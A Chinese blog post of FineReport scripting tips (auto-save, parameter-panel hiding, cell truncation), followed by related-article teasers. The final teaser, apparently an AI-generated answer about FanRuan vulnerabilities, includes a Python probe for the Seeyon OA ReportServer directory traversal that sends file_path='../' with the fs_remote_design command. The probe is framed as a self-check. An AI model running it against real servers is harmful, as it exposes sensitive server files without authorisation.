帆软day1

原创 已于 2023-01-31 14:10:49 修改 · 677 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#javascript #前端 #html

于 2022-12-27 16:34:52 首次发布

1.新增后自动刷新:

填报Web属性设置——事件设置——填报成功

js:contentPane.parameterCommit();

2.自动保存:

填报Web属性设置——事件设置——加载结束

js:

setTimeout(function() {
    contentPane.writeReport();
}, 180000);//180000ms后自动保存

3.自动获取用户名:

$fine_username

4.隐藏第几个sheet的参数区

填报Web属性设置——加载结束事件

js://通过获取第几个sheet的编号,作为对象,去执行隐藏方法

$(".fr-sheetbutton-container").click(function()
//给切换sheet的按钮绑定点击事件
{
var a = _g().selectedIndex;
//获取当前sheet的编号(从0开始)
if (a == 1) {
//如果是第2个sheet
$(".parameter-container-collapseimg-up").click();
//点击参数面板收缩按钮,即隐藏参数面板
$('.parameter-container-collapseimg-up').hide();
//隐藏收缩按钮  
} else {
$('.parameter-container-collapseimg-down').show();
//展示收缩按钮
$('.parameter-container-collapseimg-down').click();
//点击参数面板收缩按钮,即展示参数面板
}
});

5.单元格超过一定长度显示省略号(...),鼠标悬浮显示全部内容

①「模板>模板web>分页预览设置」,添加「加载结束事件」

//获取到 td 中的字符串,截取字符串
$("td[title^=cut]").each(function(){
//获取属性的值
var str = $(this).attr('title');
//定义分隔符号
var length = parseInt(str.split(":")[1]);
//判断长度
if($(this).text().length > length){
      $(this).attr('title',$(this).text());
      $(this).text($(this).text().substring(0,length)+'...');
      }else{
      $(this).removeAttr('title');
      }
})

②在 A2 单元格其他属性,内容提示输入:cut_+A2+:+5,

cut_+A2+:+5:A2 是单元格的位置;5 是显示的个数;冒号是英文符号,且前后需要使用+进行拼接,如下图所示:

6.如果链接的是填报模板,想要点击超链后模板以填报预览方式打开,此时需要在报表的路径后面加参数&op=writ

1day】致远OA组件 ReportServer 目录遍历漏洞学习
记录并分享学习安全的知识点..
09-28 2806
致远OA 组件 ReportServer接口存在目录遍历漏洞,攻击者通过漏洞可以获取服务器敏感信息。
报表设计器参数面板相关类
帆软爱好者的专栏
01-09 506
1 参数面板最外层的类是:com.fr.design.parameter.ParameterDefinitePane。
FineReport使用
lep的博客
02-01 2055
fine_position={“departments”:“人力资源”,“jobTitle”:“部长”},{“departments”:“领导部”,“jobTitle”:“部长”}变量名只能是字母 (a-z A-Z)、数字 (0-9)、下划线(_)、(@) 或中文的组合,并且之间不能包含空格。例如:report0_sale_detail、chart0_sale_summary_column_chart。获取登录系统的姓名(用户名):$user_name。例如:report0_c、report0_c_c。
FineBI-参数$fine_username不传值问题
Briwen
08-17 1627
应用场景: 从数据权限角度, 针对不同用户展示不同数据集 FineBI有两种权限管理: 一是功能权限, 在报表平台管理中设置; 二是数据权限, 一般针对报表级别 注意: 要使参数$fine_username能够成功传值, 必须先用admin账户, 或者超级管理员账户登录报表平台管理 ...
常用技术
weixin_44218799的博客
07-17 2179
帮助新手解决一些的常见问题,同时也是记录自己的一些心得
报表获取管理平台用户信息
story-xu的博客
08-09 8006
获取报表管理平台用户信息 注: 前提条件是需要建立finedb的数据连接, 可以参考我的另外一篇文章:https://blog.youkuaiyun.com/qq_31457413/article/details/98891578 报表内置HSQL数据库,其中FR_T_USER是平台用户报。 FR_T_USER用户表字段含义: 数据集中获取用户信息 新建工作簿,新增数据库查询ds1,SQL: SELECT ...
获取用户名
猫气的博客
04-12 2976
获取决策系统里姓名:插入公式 SQL("finedb", "SELECT realname FROM FINE_USER where username='" + $fine_username + "'", 1, 0)
--带参数查询
fu_manxing的专栏
12-30 8108
select FType, id, FProjectNo, FProjectManagers, FCreateDate, FProjectNumType, FPurposeProjectNum, FApplyUser, lastname, jobtId, jobtitlename, subcompanyid1, departmentid, Fchengben, esignNormalSum, DesignNormalAdd, DesignNormal, DesignWeekEnd, DesignH...
FineReport地图数据图表-按钮控件
sjfxnxsr_的博客
12-07 2371
报表服务器版本功能变更11.0--「按钮控件」可应用于填报、参数等场景中,添加按钮后,点击按钮可触发某些报表操作。如下图所示:选中单元格后,点击右侧属性面板的「控件设置」,选择控件处下拉选择「按钮控件」,如下图所示:将「按钮控件」拖入到参数面板中,如下图所示:「按钮控件」的属性设置界面如下图所示:各属性设置项的详细介绍如下:分类设置项详细介绍基本控件名称控件的名称,手动输入,通常与参数结合使用,如通过控件名获取控件后将控件值传递给对应参数,默认为空。可 用控件是否可用,勾选后,填报时控件可编辑;不
报表JS实现隐藏行列(内容伸缩)
story-xu的博客
08-13 8313
报表JS实现隐藏行列(内容伸缩) 描述: 在最近的开发过程中,碰见一个需求,用户需要定制一个页面,需要能够实现行伸缩,使页面变得整洁,明了,具体实现过程如下: 处理思路: 添加按钮点击事件来隐藏行列 操作步骤: 在合适的位置,插入按钮控件,然后可以自定义一个漂亮的图标。添加事件,点击。然后插入如下JS: 影藏行: JS 代码为: 隐藏40-50行,代码如下: $("#r-39-0")....
点击sheet 给控件赋值
weixin_43914385的博客
11-13 1260
$(".fr-sheetbutton-container").click(function() //切换 sheet 时 { //获取名为rs的控件 var a = contentPane.$contentPane.data('TabPane').tabBtns[contentPane.selectedIndex].options.name; //获取...
实现单元格可编辑内容并保存
httpmc2018的博客
10-14 6112
单元格内容 是否可编辑主要取决于单元格控件的使用。 从这里进入控件操作界面 这里可以对控件的信息进行编辑,具体内容非常丰富,可以根据字面意思进行调试,但是主要的是需要勾选可用可见 在类型中提供了很多空间类型,可以在编辑单元格的时候,提供更多方便的编辑选择或者固定可选的修改内容。 保存修改: 修改好的数据需要再报表页面添加一个保存按钮来保存。首先 在模板栏选择模板WEB属性。 找到填报页面属性,设置为为模板单独设置,不用它原来默认的。勾选使用工具栏,可以在下面的按钮中选择想要..
报表程序数据集获取参数面板上的参数值
帆软爱好者的专栏
11-04 2914
比如我们想在程序数据集中想根据tableName参数的值来动态创建数据集的列。那么如何获取该参数的值呢?
权限细粒度控制
hzp666的博客
04-02 3403
权限细粒度控制 目录: 1.描述 1.描述编辑 权限细粒度控制是指针对模板内部的小处方面进行权限控制,比如说单元格内容数据,控件、隐藏行列、工具栏,sheet,图表等等。 不同的角色用户登录系统,希望可操作的内容不一样,比如说工具栏按钮不一样,模板预览时,展示的单元格不一样,填报数据时,对某些控件拥有的编辑权限不一样,查看数据时,看到的数据不一样。 FineRepo...
JS实现点击按钮切换sheet页
hzp666的博客
05-10 1800
1.需求描述 有的时候我们想实现上一页、下一页或跳转到指定sheet页。效果如下 2.操作步骤 选中按钮>添加按钮点击事件 具体js如下 首页js //跳转到首页(因为下标是从0开始) fr-sheetbutton-container为sheet页的集合 $(".fr-sheetbutton-container").eq(0).trigger("click"); ...
FineReport-数据过滤权限设置
weixin_41668007的博客
02-10 7719
目的本省份的人只能看到某表单属于该省份的数据 安徽只能看到安徽的数据 一、在数据库中建立一张权限对应表,该表字段包含登录用户名、省份名称即可 二、在报表模板数据集中设置过滤 select * from table1 t1 left join table2 t2 on t1.MZ=t2.USERNAME where t2.LOGIN_NAME='${fine_username}' 表1为业务产生的表,表2为权限表,连接关系为省份,通过权限表中的用户名限制数据,登录的用户名.
填报报表实现日期自动生成总结
一份耕耘,一分收获
08-26 7556
使用报表 FineReport 的填报报表实现插入数据时自动生成日期,修改数据时,自动生成修改时间
漏洞0day
最新发布
03-24
### 关于件的0day漏洞最新信息 目前关于件是否存在未公开的0day漏洞的信息较为有限。然而,根据已有资料可知,“零日”漏洞并不一定指代刚刚被发现的漏洞,而是特指那些尚未被件供应商和公众知晓但已被攻击者掌握的安全缺陷[^1]。 在实际案例中,件曾因反序列化问题暴露出严重的安全风险。例如,在某些情况下,由于HSQL链的不当处理,可能导致反序列化漏洞的发生[^3]。这类漏洞可能允许攻击者通过精心构造的数据包实现远程代码执行或其他恶意行为。尽管这些具体细节未必属于严格意义上的“0day”,但从其潜在危害来看,确实反映了产品在过去可能存在类似的高危安全隐患。 至于最新的0day漏洞情况,通常此类敏感信息不会广泛传播至公共领域,除非已经被披露或修复。如果存在新的0day漏洞,一般会由专业的漏洞挖掘团队、独立研究人员或是特定的情报共享平台率先掌握,并可能遵循负责任的披露流程通知厂商先行修补后再对外公布[^5]。 值得注意的是,即便没有确切的新近0day记录浮现,基于历史上的多个实例——比如致远OA组件ReportServer接口曾经暴露出来的目录遍历漏洞等问题[^4]——仍需保持高度警惕。这表明即使官方声明无明显即时威胁,也不能排除内部逻辑设计上尚存未知隐患的可能性。 ```python import requests def check_vulnerability(url, params): try: response = requests.get(url, params=params) if response.status_code == 200 and 'sensitive_info' in response.text: print("Potential Vulnerability Detected!") else: print("No obvious vulnerability found.") except Exception as e: print(f"Error occurred: {e}") # Example usage with hypothetical parameters based on previous PoCs. url = "http://example.com/seeyonreport/ReportServer" params = { "op": "fs_remote_design", "cmd": "design_list_file", "file_path": "../", "currentUserName": "admin", "currentUserId": "1", "isWebReport": "true" } check_vulnerability(url,params) ``` 上述脚本仅为示意如何构建基本测试框架来探测类似路径穿越类别的弱点,请务必合法合规地使用此类方法论进行环境自查而非非法渗透尝试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值